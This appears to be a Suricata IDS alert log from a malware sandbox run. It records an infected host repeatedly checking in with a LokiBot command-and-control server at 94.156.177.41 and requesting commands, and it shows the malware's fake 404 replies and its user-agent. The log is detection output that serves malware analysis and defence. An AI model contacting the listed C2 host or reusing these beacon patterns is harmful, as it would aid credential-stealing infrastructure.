                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49794
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49804 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49798 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49798 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49798 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49804 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49765
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49747
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49790 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49798 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49790 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49798 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49790 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49801 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49803
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49822
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49776
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49888
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49789
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49843
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49962 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49777
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49962 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49962 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49770
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49790 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49950 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49801 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49801 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49974 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49801 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49801 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49790 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49974 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49974 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49798
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49950 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49795 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49804
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49950 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49763
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49782
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50003 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49795 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49795 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50003 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50003 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49974 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49974 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49985 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49795 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49927 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49927 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49795 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49927 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49764
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49941 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49941 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50003 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49941 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49857 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50019 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49769
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50019 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49927 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49857 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49786
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50003 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50019 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49941 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49927 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49857 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50019 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50019 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49857 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49950 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49857 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49950 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50038 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50038 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50038 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49882 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49882 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49941 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49785 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49882 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49875
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49792
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49790
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49787
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50045 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49785 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50045 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50054 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50054 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49962 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49962 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50045 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49985
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50038 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49882 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50060 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49882 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49795
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50054 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49857
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50045 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49785 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50060 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49910 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50045 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50060 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50003
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49910 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49927
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49974
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49785 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49837 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49910 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49837 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49837 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50079 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50060 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50060 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49910 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50038 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49785 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50073 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50019
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49800 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50054 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49991 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49950
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49784 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49783 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49784 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49910 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49784 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49800 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50010 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49837 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50073 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49837 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49784 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49801
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49784 -> 94.156.177.41:80
